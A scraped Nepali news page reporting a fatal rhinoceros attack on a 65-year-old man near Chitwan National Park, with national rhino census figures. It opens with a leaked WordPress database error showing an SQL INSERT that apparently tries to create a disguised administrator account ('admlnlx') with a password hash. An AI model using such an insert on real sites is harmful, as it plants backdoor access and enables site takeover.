WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJoJcMQQE08WtQtvK0nQ.bwMK6ScAj1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 13:47:30', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । बर्दघाट–सुस्तापूर्व०को कावासोतीमा गैँडाको आक्रमणबाट कावासोती–१५ शेरगञ्जका ६५ वर्षीय रेशमलाल महतको मृत्यु भएको छ ।
आफ्नै घर नजिकको चउरमा बसिरहेका अवस्थामा उनलाई मध्यवर्ती क्षेत्रबाट आएको गैँडाले एक्कासी आक्रमण गरेको थियो । मध्यविन्दु जिल्ला अस्पताल डण्डामा उपचारका क्रममा बुधबार राति महतको मृत्यु भएको चितवन राष्ट्रिय निकुञ्जका सूचना अधिकारी एवं सहायक संरक्षण अधिकृत गणेशप्रसाद तिवारीले जानकारी दिए । जिल्लामा निकुञ्ज र मध्यवर्ती क्षेत्रबाट निस्कने गैँडाको आक्रमणबाट बर्सेनि स्थानीयवासीले ज्यान गुमाउने गरेका छन् ।
पछिल्लो राष्ट्रिय गैँडा गणना २०७७ अनुसार नेपालमा ७५२ गैँडा छन् भने चितवन राष्ट्रिय निकुञ्जमा मात्रै ६९४ गैँडा भेटिएका छन् ।